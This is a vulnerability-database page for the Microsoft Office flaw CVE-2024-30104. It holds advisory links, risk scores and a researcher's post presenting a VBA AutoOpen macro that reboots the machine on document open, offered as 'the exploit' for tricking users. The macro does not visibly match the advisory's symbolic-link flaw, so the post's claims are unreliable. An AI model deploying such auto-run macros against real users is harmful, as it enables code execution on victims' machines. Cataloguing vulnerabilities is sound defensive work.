Vulners
Lucene search
Microsoft Office 265 Remote Code Execution
| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
 | The vulnerability of the Microsoft Office suite arises from the improper handling of symbolic links before accessing a file, allowing an attacker to execute arbitrary code. | 19 Jun 202400:00 | – | bdu_fstec |
 | CVE-2024-30104 | 8 Jul 202519:17 | – | circl |
 | Microsoft Office 后置链接漏洞 | 11 Jun 202400:00 | – | cnnvd |
 | Microsoft Office Remote Code Execution Vulnerability (CNVD-2024-28624) | 14 Jun 202400:00 | – | cnvd |
 | CVE-2024-30104 | 11 Jun 202417:00 | – | cve |
 | CVE-2024-30104 Microsoft Office Remote Code Execution Vulnerability | 11 Jun 202417:00 | – | cvelist |
 | EUVD-2024-28041 | 3 Oct 202520:07 | – | euvd |
 | Description of the security update for Office 2016: June 11, 2024 (KB5002575) | 11 Jun 202407:00 | – | mskb |
| Description of the security update for Office 2016: June 11, 2024 (KB5002591) | 11 Jun 202407:00 | – | mskb |
 | KLA68919 Multiple vulnerabilities in Microsoft Office | 11 Jun 202400:00 | – | kaspersky |
10
`### [CVE-2024-30104](https://attackerkb.com/contributors/nu11secur1ty)
The problem is still in the "docx" files this vulnerability is a 0 day
based on the Follina exploit. The Microsoft company still doesn't want
to understand, that they MUST remove macros options from the 365
Office and their offline app. In this video, you will see an example
of this, how some users can be trickery to open the malicious file
that is sent to them by the attacker. After execution of the file, the
thing will be very bad for the users who execute it on their computer.
It depends of the scenario.
### The exploit:
```vbs
Sub AutoOpen()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "shutdown /R"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub
```
- Enjoy watching
### PoC:
[video](https://www.patreon.com/posts/cve-2024-30104-107163015)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jul 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 3.17.8
EPSS0.00583
SSVC